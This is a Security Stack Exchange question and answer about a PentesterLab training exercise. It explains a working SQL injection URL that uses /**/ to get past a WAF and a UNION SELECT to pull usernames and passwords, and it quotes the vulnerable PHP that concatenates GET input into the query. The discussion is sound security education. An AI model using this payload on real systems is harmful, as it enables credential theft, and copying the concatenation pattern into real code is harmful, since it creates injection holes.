1

I am trying to understand The Pentester Lab challenge here at VulnHub.

After I translated this tutorial into English, at Exercise 2 I was presented with the following SQLi which completes the challenge:

http://pentesterlab/sqli/example2.php?name=root'/**/union/**/select/**/1,(select/**/name/**/from/**/users/**/limit/**/3,1),(select/**/passwd/**/from/**/users/**/limit/**/3,1),4,5/**/and/**/'1'='2

The /**/ is used to bypass the WAF which filters space characters.

The union select 1 part just displays the number 1 circled in red.

The brackets ( ... ) are used syntactically to prevent the DBMS from misunderstanding the limit part, as limit 3,1,select and as limit 3,1,4,5, which would both be incorrect without the brackets.

The limit 3,1 part means after the third result, output the next one, so it gets one name and one password, circled in blue.

Provided my understanding above is correct, I cannot understand why the tutorial author included the 4,5 part, nor why they included the '1'='2 part which evaluates to false?

mentallurg
  • 8,536
  • 4
  • 26
  • 41
questioner
  • 171
  • 2
  • 11

1 Answers1

2

why they included the '1'='2 part which evaluates to false

$sql .= $_GET["name"]."'";

In the code snippet above, notice that a ' is appended to the end of the $_GET["Name"] (which is all being appended to the select command). In the exploit you're providing the closing ' after the name (root) so you need to account for the appended '. You do this by adding the and '1'='2 to the end so when the ' is appended it is proper syntax. In pseudo code it's equivalent to "In the fifth column I want to put the value of "true (5) and false (1=2)" which is false (0). When I tested the exploit it didn't matter whether the and evaluated to true or false. I'm guessing it's to prevent anything unexpected from happening with a true value.

why the tutorial author included the 4,5 part

TL;DR - The union operator in SQL requires the same number of columns from all select statements. The users table has five columns so the union select needs five columns.

The Details

As you can see from this screenshot, the users table in the lab has five columns.

enter image description here

And the query in the php script is selecting all the columns:

$sql = "SELECT * FROM users where name='";
$sql .= $_GET["name"]."'";

The exploit is using a SQL union operator to return additional information. The select after the union must have five columns because the users table has five columns. When you perform a union in SQL:

  • Every SELECT statement within UNION must have the same number of columns.
  • The columns must also have similar data types
  • The columns in every SELECT statement must also be in the same order

Reading into it a bit further, the select in the php is populating the first row. The select after the union is populating the second row. It's filling the value '1' in the first column, the username in the second, the password in the third, and the values '4' and '5' in the fourth and fifth column respectively.

References
MySql Union

kenlukas
  • 835
  • 6
  • 18
  • In the first paragraph, I am confused as to why doing AND False (because 1 is not equal to 2) would not cause the whole statement to fail. In programming languages like C, when using AND both sides must evaluate to TRUE. It is weird how it can be either true or false. I do understand it is to resolve the trailing ' symbol, another approach that works is to use two -- (%23%23). That was a very good answer! – questioner Jun 08 '22 at 18:03
  • 1
    @questioner it doesn't fail because it's only affecting the fifth column entry and the value it puts there. In MySQL (maybe others), any non-zero number is a boolean true. `5 and '1'='2'` is the same thing as entering `true and false` which returns false e.g. 0 for the value of the 5th column. – kenlukas Jun 08 '22 at 19:08
  • That made perfect sense. If I could actually see the 5th column in that SQL injection then it would contain the number 0, or 1 if I made the statement evaluate to true. You have been such a huge help, I have marked as accepted. – questioner Jun 08 '22 at 20:15
  • Would you have any idea about this other question? https://security.stackexchange.com/questions/262605/why-are-mysql-injections-more-limited-than-ms-sql-attacks – questioner Jun 08 '22 at 20:32